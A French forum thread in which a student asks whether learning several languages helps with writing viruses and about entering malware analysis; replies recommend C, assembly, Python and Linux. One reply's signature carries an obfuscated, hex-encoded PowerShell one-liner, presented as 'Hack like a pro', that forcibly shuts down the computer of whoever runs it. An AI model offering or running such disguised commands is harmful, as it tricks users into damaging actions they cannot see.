Annonce

Réduire
Aucune annonce.

Les virus!

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Les virus!

    Bonjour à tous et à toute. Jeune étudiant en informatique qui par la suite va s'orienter en réseau/sécurité ainsi que faire des études en plus pour avoir un diplôme en cybersécurité mais je ne suis pas encore là ^^" toutes choses en son temps comme on dit!
    Ma question est là ici j'apprends le langage C. comme j'ai pu comprendre d'après les ouvrages que je lis c'est un langage de bas niveau donc je peux faire plus de chose mais la question n'est pas là, j'aimerais savoir votre avis sur le fait " apprendre plusieurs langage de programmation" est-ce utile pour la conception de d'un virus ? Après j'apprends en plus ruby chez moi après mes heures de cours et j'envisage peut-être encore d'autres langages car j'aimerais m'orienter dans l'analyse de virus informatiques c'est un domaine qui attire ma curiosité.
    Merci de vos réponses et désolé si cette question peut-être bête pour certains mais j'ai besoin d'avis ^^"

  • #2
    Un peu tard pour une réponse mais je te conseils d'apprendre le python et également de passer sous Linux.

    Commentaire


    • #3
      Merci beaucoup mais je suis très nul en informatique😓

      Commentaire


      • #4
        assimil : désolé c'est un peu tard, mais si tu passes par là :
        Je ne m'étendrai pas sur la partie "conception de virus" de ta question, parce que je connais pas, mais sache que le C est toujours une bonne option.

        Sinon, si tu veux faire de l'analyse de malware, reste dans le bas niveau : Tu n'auras que rarement l'occasion d'accéder au code source du malware, il te faudra donc faire du reverse engineering en assembleur. Connaître le langage C est de loin la meilleure porte d'entrée possible pour rapidement se mettre à l'asm.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          À savoir que python peut être compilé aussi... Bonne soirée.

          Commentaire


          • #6
            Merci pour vos réponses les gars !

            Commentaire

            Chargement...
            X